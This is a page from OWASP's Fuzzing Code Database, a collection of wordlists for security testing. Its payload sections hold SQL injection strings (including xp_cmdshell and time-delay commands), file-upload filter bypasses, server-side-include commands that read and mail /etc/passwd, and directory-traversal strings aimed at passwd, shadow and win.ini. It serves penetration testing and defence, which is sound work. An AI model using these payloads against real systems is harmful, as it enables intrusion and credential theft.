Category:OWASP Fuzzing Code Database

This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab, WebSlayer and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News
02 February 2010'


 * Created new Category Lotus/Notes Files

11 August 2009


 * Created new Category: XML Attacks

Update Statements


 * 15 new XML Statements
 * 93 new SQL Injections Statements
 * 67 new Traversal Directory Statements
 * Delete 33 XSS Statement Duplicate
 * 30 New XSS Statements

7 August 2009


 * Updated the objectives of the project.

21 July 2009


 * Set the team responsible for the project.

Goals
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer, Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

File Upload Filter Bypass (Update: 17 March 2009 - notes

 * 1) File Upload Fuzzfile - File Name Filter Bypass
 * 2) adam.muntner@quietmove.com
 * 3) released under creative commons license


 * 1) For MIME filter bypass, your shellscript should look like
 * 2) GIF89aP;
 * 3) [shell]
 * 1) [shell]


 * 1) For mod_cgi Server Side Include upload attacks
 * or, on Windows
 * or, on Windows
 * or, on Windows
 * or, on Windows
 * or, on Windows

ecutable
 * 1) Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to ex
 * 1) example .htaccess:
 * 2) AddType application/x-httpd-php .jpg
 * 1) AddType application/x-httpd-php .jpg

Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2009
%00index.html
 * 1) Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009
 * 2) adam.muntner@quietmove.com
 * 3) released under creative commons license
 * index.html

Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2009
{PHPSCRIPT} {PHPSCRIPT}.phtml {PHPSCRIPT}.php.html {PHPSCRIPT}.php::$DATA {PHPSCRIPT}.php.php.rar {PHPSCRIPT}.php.rar
 * 1) Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes
 * 2) adam.muntner@quietmove.com
 * 3) released under creative commons license
 * 4) also: use "gim" to create a .jpg image with the meta comment field set to:
 * 5) 
 * 1) 

Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2009
{ASPSCRIPT} {ASPSCRIPT}; {ASPSCRIPT};.jpg {ASPSCRIPT};.pdf {ASPSCRIPT};.html {ASPSCRIPT};.htm {ASPSCRIPT};.txt {ASPSCRIPT};.xyz {ASPSCRIPT};.zip {ASPSCRIPT};.tgz {ASPSCRIPT};.doc {ASPSCRIPT};.docx {ASPSCRIPT};.xls {ASPSCRIPT};.xlsx
 * 1) Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009
 * 2) adam.muntner@quietmove.com
 * 3) released under creative commons license

{HOST}/templates_compiled/ {HOST}/templates_c/ {HOST}/templates/ {HOST}/temporary/ {HOST}/images/ {HOST}/cache/ {HOST}/temp/ {HOST}/files/ {HOST}/tmp/
 * 1) Commonly writable directories

(Common Data File Extensions (Update: 16 March 2009 - Total Statements: 863)

 * 1) adam.muntner@quietmove.com
 * 2) released under creative commons license

.$er .123 .1pe .1ph .3dr .3dt .3me .3pe .4dl .4dv .8xk .^^^ .a3l .a3m .a3w .a4l .a4m .a4w .a5l .a5w .a65 .aao .ab .ab1 .ab2 .ab3 .abcd .abi .abp .aby .aca .acc .accdb .acf .acg .ade .adp .adt .adx .aft .agd .aifb .alc .ald .ali .amb .amsorm .an1 .anme .apr .arc .arh .ask .asm .ast .at5 .att .aw .awg .azw .bafl .bci .bcm .bdf .bdic .bfx .bgl .bgt .bin .bjo .bk .bkk .blb .bld .blg .bok .box .brd .brw .btf .btif .btm .btr .cap .cat .cbg .cch .ccr .cct .cdb .cdd .cdf .cdp .cdr .cdx .cel .celtx .chg .chk .chn .ckd .ckt .cl2 .cl4 .clb .clix .clm .clp .cmbl .cna .contact .cpi .cpmz .crd .crtx .csa .csv .ctf .ctt .cursorfx .curxptheme .cvd .cvn .cwk .cws .cwz .cxt .cyo .cys .daf .dal .dam .das .dat .data .db .db2 .db3 .dbc .dbd .dbf .dbx .dcf .dcl .dcm .dcmd .ddc .ddcx .ddt .dem .des .dex .dfm .dfproj .dft .dgb .dif .dii .dlg .dm2 .dmo .dmsk .dnc .dockzip .dp1 .dpn .dpx .drl .dsb .dsd .dsk .dsy .dsz .dt0 .dt1 .dt2 .dta .dtr .dvdproj .dvo .dwi .e00 .eap .ebuild .ec0 .eco .ecx .edb .edf .eep .efx .egp .emb .emd .emlxpart .enc .enw .epp .epub .epw .er1 .esp .ess .est .esx .et .eta .etd .etl .ev .ev3 .evt .evy .exif .exp .exx .fa .fasta .fbl .fcd .fcs .fdb .ffd .ffwp .fhc .fid .fil .flame .fll .flo .flp .flt .fm .fm5 .fmp .fo .fob .fol .fop .fox .fp .fp3 .fp4 .fp5 .fp7 .frl .frm .fro .frx .fsb .fsc .ftm .ftw .gan .gbr .gc .gcx .gdb .ged .gedcom .gen .ggb .gml .gms .gno .gnp .gp3 .gpi .gps .gpx .gra .grade .grf .grib .grk .grr .grv .gs .gst .gtp .gwk .gxl .hcc .hce .hci .hcp .hcr .hcu .hda .hdb .hdf .hdi .hdl .hif .hl .hml .hmt .hs2 .hsk .hst .htg .huh .hyv .i5z .ib .ics .id2 .idx .igc .ihx .ii .iif .img .imt .ink .inp .ins .ip .irock .irr .irx .isf .itdb .itl .itm .itn .itw .itx .ivt .iw .ixb .jasper .jdb .jef .jmp .jnt .job .joboptions .joined .jph .jrprint .jrxml .jude .kap .kdb .kid .kismac .kmz .kpf .kpp .kpr .kpx .kpz .l .l6t .laccdb .lbl .lbx .lcd .lcf .lcm .ldif .lex .lgc .lgf .lgh .lgi .lgl .lib .lif .livereg .liveupdate .lix .llb .lms .lmx .lnt .loc .lp7 .lrf .lrs .lrx .lsf .lsl .lsp .lsr .lst .lsu .lvm .lw4 .ly .m .mag .mai .map .masseffectprofile .mat .mbb .mbf .mbg .mbl .mbp .mbx .mc1 .mc9 .mcd .md .mdb .mdc .mdf .mdl .mdm .mdn .mdt .mdx .mdz .mem .menc .met .mex .mfo .mfp .mgc .mls .mm .mmap .mmc .mmf .mmp .mnc .mng .mnk .mno .mny .mobi .moho .mosaic .mox .mpd .mpj .mpp .mpt .mpx .mpz .mq4 .ms10 .mth .mtw .mud .muf .mw .mwf .mws .mwx .mxd .myd .myi .nb .nc .ndf .ndk .ndx .net .neta .nfo .nitf .nmind .not .notebook .np .npl .npt .nrl .ns2 .ns3 .ns4 .nsf .ntx .numbers .nvl .nyf .oab .obj .odb .odf .odp .ods .odx .oeaccount .ofc .ofm .oft .ofx .omcs .omp .ond .one .oo3 .opf .opx .or2 .or3 .or4 .or5 .or6 .org .orx .otf .otl .otln .ots .out .ov2 .ova .ovf .p96 .p97 .pab .paf .pan .pbd .pc .pcap .pcb .pcr .pd4 .pd5 .pdas .pdb .pdd .pdm .pds .pdx .peb .pec .pep .pex .pfc .pfl .phb .phm .pi .pis .pjx .pka .pkb .pkh .pks .pkt .pln .plw .pmo .pmr .pnproj .pnpt .pns .pnt .pod .poi .pos .postal .pot .potm .potx .pp2 .ppf .pps .ppsx .ppt .pptm .pptx .prc .pre .prf .prj .prm .prs .psa .psf .psm .pst .ptb .ptf .ptk .ptm .ptn .ptt .ptz .pvl .pwd .pxj .pxl .q07 .q08 .q09 .q3d .qbw .qdat .qdf .qdfm .qel .qfx .qif .qpb .qpf .qph .qpm .qpw .qrp .qsd .ral .rbt .rcd .rcg .rdb .rdf .rdx .ref .ret .rf1 .rfa .rfo .rge .rgn .rgo .rmuf .rnq .rod .rog .roi .rou .rpp .rpt .rrt .rsc .rsd .rsw .rte .rvt .rwg .rzb .s85 .saf .sam07 .sar .sav .sbd .sbf .sbq .sbt .sca .scf .sch .sdb .sdc .sdf .sdp .sdq .sds .sen .seo .seq .ser .sgml .sgn .shp .shs .shx .skc .skv .skx .sle .slk .slp .snapfireshow .sonic .soundpack .spo .sps .spub .spv .sq .sqd .sql .sqlite .sqr .sta .stc .stf .stk .stl .stm .stp .str .stt .stw .styk .stykz .swk .sxc .sxi .sy3 .t01 .t02 .t03 .t04 .t05 .t06 .t07 .t08 .t09 .t2 .t3001 .tax2008 .tax2009 .tb .tbk .tbl .tcc .tcx .tda .tdl .tdm .tdt .te .te3 .teacher .tef .tet .tfa .tfd .tfrd .tjp .tk3 .tkfl .tmw .tol .topc .tpb .tps .tr3 .tra .trd .trk .trs .trx .tst .tsv .ttk .txa .txd .txf .uccapilog .ud .udb .udeb .uds .ulf .ulz .update .upoi .usr .uvf .uwl .val .vbpf1 .vcd .vce .vcf .vcs .vdb .vdx .vfs .vi .vip .vle .vlg .vmt .voi .vok .vrd .vscontent .vsx .vtx .vxml .w02 .wab .wb1 .wb2 .wb3 .wdb .wdq .wea .wfd .wfm .wgp .wgt .windowslivecontact .wjr .wk1 .wk2 .wk3 .wk4 .wk5 .wke .wki .wks .wku .wlmp .wmdb .wor .wpc .wpf .wpo .wq1 .wq2 .wtb .wtr .xbk .xdb .xdp .xds .xef .xem .xfd .xfo .xft .xl .xlc .xlgc .xlr .xls .xlsb .xlsm .xlsx .xlt .xltm .xltx .xlw .xmcd .xml .xmlper .xmpz .xpg .xpj .xpm .xpt .xrp .xsl .xslt .xsn .xtm .xtp .xxd .yam .zap .zdb .zdc .zix .zmc .zpl .{pb .~hm

(Compressed File Types - (Update: 16 March 2009 - Total Statements: 187)
.0 .000 .7z .a00 .a01 .a02 .ace .ain .alz .apz .ar .arc .arh .ari .arj .ark .axx .b64 .ba .bh .boo .bz .bz2 .bzip .bzip2 .c00 .c01 .c02 .car .cb7 .cbr .cbt .cbz .cp9 .cpgz .cpt .dar .dd .deb .dgc .dist .ecs .efw .epi .f .fdp .gca .gz .gzi .gzip .ha .hbc .hbc2 .hbe .hki .hki1 .hki2 .hki3 .hpk .hyp .ice .ipg .ipk .ish .j .jar.pack .jgz .jic .kgb .lbr .lemon .lha .lnx .lqr .lz .lzh .lzm .lzma .lzo .lzx .md .mint .mou .mpkg .mzp .oar .p7m .pack.gz .package .pae .pak .paq6 .paq7 .paq8 .par .par2 .pbi .pcv .pea .pet .pf .pim .pit .piz .pkg .pup .puz .pwa .qda .r0 .r00 .r01 .r02 .r03 .r1 .r2 .r30 .rar .rev .rk .rnc .rp9 .rpm .rte .rz .rzs .s00 .s01 .s02 .s7z .sar .sdc .sdn .sea .sen .sfs .sfx .sh .shar .shk .shr .sit .sitx .spt .sqx .sqz .tar .tar.gz .tar.xz .taz .tbz .tbz2 .tg .tgz .tlz .tlzma .txz .tz .uc2 .uha .vem .vsi .wad .war .wot .xef .xez .xmcdz .xpi .xx .xz .y .yz .z .z01 .z02 .z03 .z04 .zap .zfsendtotarget .zip .zipx .zix .zoo .zpi .zz

(Uncommon Data File Extensions (Update: 16 March 2009 - Total Statements: 284)
.3me .3pe .4dl .8xk .^^^ .aao .ab2 .aca .accdb .acf .acg .agd .an1 .anme .arc .arh .ast .att .aw .bafl .bdf .bfx .bjo .bld .blg .btf .btif .btr .cct .cdb .cdd .cdf .cdp .cdr .chk .ckd .cl2 .cl4 .clb .clix .clm .cmbl .contact .cpi .cpmz .csv .cwz .cxt .daf .dat .data .db .dcf .ddt .dex .dif .dmsk .dnc .dpx .dsd .dt1 .dt2 .dta .e00 .ec0 .edf .eep .efx .enc .enw .epw .est .et .eta .ev3 .exif .exp .fbl .fdb .fid .fol .gdb .gen .gnp .gpi .gpx .hcp .hdf .hmt .hsk .htg .id2 .ii .img .ink .ins .irr .irx .iw .jdb .jnt .job .jrprint .kmz .lbx .lex .lgf .lgl .lib .liveupdate .lnt .lst .m .masseffectprofile .mat .mbb .mdb .mem .menc .met .mmf .mng .mpd .mpp .ms10 .muf .mw .mwf .mwx .nc .ndx .nfo .not .ns2 .ns3 .ns4 .ntx .numbers .ods .oeaccount .omcs .or2 .or3 .or4 .or5 .orx .out .ov2 .ovf .paf .pbd .pcr .pdb .pdx .peb .pec .pfc .pis .pln .pnpt .pns .pnt .pos .postal .pps .ppsx .ppt .pptm .pptx .pre .prf .psa .psf .pst .ptz .q07 .q3d .qbw .qdat .qdf .qfx .qpf .qpw .qsd .rcd .rdx .ref .rmuf .roi .rrt .rvt .rwg .saf .sam07 .sbd .sbf .sbq .sbt .sdb .sdc .sdf .sds .ser .sgn .shs .skc .slk .sonic .soundpack .spo .sql .stf .stl .stm .sy3 .t08 .t09 .t2 .tax2009 .tdl .tdt .te .teacher .tmw .tol .trk .trs .trx .tsv .uccapilog .ud .udeb .uds .update .uwl .val .vcf .vdb .vfs .vip .vle .vlg .vxml .w02 .wab .wb1 .wb3 .wdq .wfd .wfm .windowslivecontact .wk1 .wk2 .wk3 .wk4 .wk5 .wke .wks .wlmp .wpc .wpo .wq1 .wq2 .wtr .xbk .xdb .xds .xfd .xl .xlgc .xlr .xls .xlsx .xltm .xltx .xml .xmpz .xsl .xsn .xtm .xtp .xxd .{pb .~hm

Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65)
CFIDE/Administrator/ CFIDE/Administrator/index.cfm CFIDE/Administrator/login.cfm CFIDE/Administrator/Application.cfm CFIDE/Application.cfm CFIDE/adminapi/ CFIDE/adminapi/Application.cfm CFIDE/adminapi/administrator.cfc CFIDE/adminapi/base.cfc CFIDE/adminapi/customtags/ CFIDE/adminapi/customtags/l10n.cfm CFIDE/adminapi/customtags/resources CFIDE/adminapi/customtags/resources/ CFIDE/adminapi/datasource.cfc CFIDE/adminapi/debugging.cfc CFIDE/adminapi/eventgateway.cfc CFIDE/adminapi/extensions.cfc CFIDE/adminapi/mail.cfc CFIDE/adminapi/runtime.cfc CFIDE/adminapi/security.cfc CFIDE/adminapi/_datasource/ CFIDE/adminapi/_datasource/formatjdbcurl.cfm CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm CFIDE/adminapi/_datasource/geturldefaults.cfm CFIDE/adminapi/_datasource/setdsn.cfm CFIDE/adminapi/_datasource/setmsaccessregistry.cfm CFIDE/adminapi/_datasource/setsldatasource.cfm CFIDE/classes/ CFIDE/classes/cf-j2re-win.cab CFIDE/classes/cfapplets.jar CFIDE/classes/images CFIDE/componentutils/ CFIDE/componentutils/Application.cfm CFIDE/componentutils/cfcexplorer.cfc CFIDE/componentutils/cfcexplorer_utils.cfm CFIDE/componentutils/componentdetail.cfm CFIDE/componentutils/componentdoc.cfm CFIDE/componentutils/componentlist.cfm CFIDE/componentutils/gatewaymenu CFIDE/componentutils/gatewaymenu/ CFIDE/componentutils/gatewaymenu/menu.cfc CFIDE/componentutils/gatewaymenu/menunode.cfc CFIDE/componentutils/login.cfm CFIDE/componentutils/packagelist.cfm CFIDE/componentutils/utils.cfc CFIDE/componentutils/_component_cfcToHTML.cfm CFIDE/componentutils/_component_cfcToMCDL.cfm? CFIDE/componentutils/_component_style.cfm CFIDE/componentutils/_component_utils.cfm CFIDE/debug/ CFIDE/debug/images/ CFIDE/debug/includes/ CFIDE/images/ CFIDE/images/skins/ CFIDE/install.cfm CFIDE/installers/ CFIDE/installers/CFMX7DreamWeaverExtensions.mxp CFIDE/installers/CFReportBuilderInstaller.exe CFIDE/probe.cfm CFIDE/scripts/ CFIDE/scripts/css/ CFIDE/scripts/xsl/ CFIDE/wizards/ CFIDE/wizards/common/ CFIDE/wizards/common/utils.cfc

All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)
OPTIONS GET HEAD POST PUT DELETE TRACE CONNECT PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK VERSION-CONTROL REPORT CHECKOUT CHECKIN UNCHECKOUT MKWORKSPACE UPDATE LABEL MERGE BASELINE-CONTROL MKACTIVITY ORDERPATCH ACL PATCH SEARCH ARBITRARY

Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)
/852566C90012664F /admin4.nsf /admin5.nsf /admin.nsf /agentrunner.nsf /alog.nsf /a_domlog.nsf /bookmark.nsf /busytime.nsf /catalog.nsf /certa.nsf /certlog.nsf /certsrv.nsf /chatlog.nsf /clbusy.nsf /cldbdir.nsf /clusta4.nsf /collect4.nsf /da.nsf /dba4.nsf /dclf.nsf /DEASAppDesign.nsf /DEASLog01.nsf /DEASLog02.nsf /DEASLog03.nsf /DEASLog04.nsf /DEASLog05.nsf /DEASLog.nsf /decsadm.nsf /decslog.nsf /DEESAdmin.nsf /dirassist.nsf /doladmin.nsf /domadmin.nsf /domcfg.nsf /domguide.nsf /domlog.nsf /dspug.nsf /events4.nsf /events5.nsf /events.nsf /event.nsf /homepage.nsf /iNotes/Forms5.nsf/$DefaultNav /jotter.nsf /leiadm.nsf /leilog.nsf /leivlt.nsf /log4a.nsf /log.nsf /l_domlog.nsf /mab.nsf /mail10.box /mail1.box /mail2.box /mail3.box /mail4.box /mail5.box /mail6.box /mail7.box /mail8.box /mail9.box /mail.box /msdwda.nsf /mtatbls.nsf /mtstore.nsf /names.nsf /nntppost.nsf /nntp/nd000001.nsf /nntp/nd000002.nsf /nntp/nd000003.nsf /ntsync45.nsf /perweb.nsf /qpadmin.nsf /quickplace/quickplace/main.nsf /reports.nsf /sample/siregw46.nsf /schema50.nsf /setupweb.nsf /setup.nsf /smbcfg.nsf /smconf.nsf /smency.nsf /smhelp.nsf /smmsg.nsf /smquar.nsf /smsolar.nsf /smtime.nsf /smtpibwq.nsf /smtpobwq.nsf /smtp.box /smtp.nsf /smvlog.nsf /srvnam.htm /statmail.nsf /statrep.nsf /stauths.nsf /stautht.nsf /stconfig.nsf /stconf.nsf /stdnaset.nsf /stdomino.nsf /stlog.nsf /streg.nsf /stsrc.nsf /userreg.nsf /vpuserinfo.nsf /webadmin.nsf /web.nsf /.nsf/../winnt/win.ini /?Open

SQL Injection -(Update: 11 August 2009 - Total Statements: 126)
Statement 'sqlvuln '+sqlvuln sqlvuln; (sqlvuln) a' or 1=1-- "a"" or 1=1--" or a = a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ‘ or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'-- ' '%20or%20''=' '%20or%20'x'='x %20or%20x=x ')%20or%20('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # or 0=0 #" or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- ' or 1 --' or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a ) or (a=a hi or a=a hi or 1=1 --" hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a "hi"") or (""a""=""a" 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset &lt;&gt;"'%;)(&amp;+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT &amp;apos;%20OR 'sqlattempt1 (sqlattempt2) %7C %2A%7C %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 &amp; %26 ! %21 ' or 1=1 or =' ' or =' x' or 1=1 or 'x'='y / // //* a' or 3=3-- "a"" or 3=3--" ' or 3=3 ‘ or 3=3 --
 * (|(mail=*))
 * (|(objectclass=*))

SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt; &lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt; &lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt; &lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)
Statement \..\WINDOWS\win.ini \..\..\WINDOWS\win.ini \..\..\..\WINDOWS\win.ini \..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\..\WINDOWS\win.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c ../../../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../etc/passwd ../../../../etc/passwd ../../../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 ../../../.htaccess ../../.htaccess ../.htaccess .htaccess ././.htaccess %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%68%74%61%63%63%65%73%73 %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/hosts ../../boot.ini /../../../../../../../../%2A ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/shadow%00 ../../../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow^^ /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow 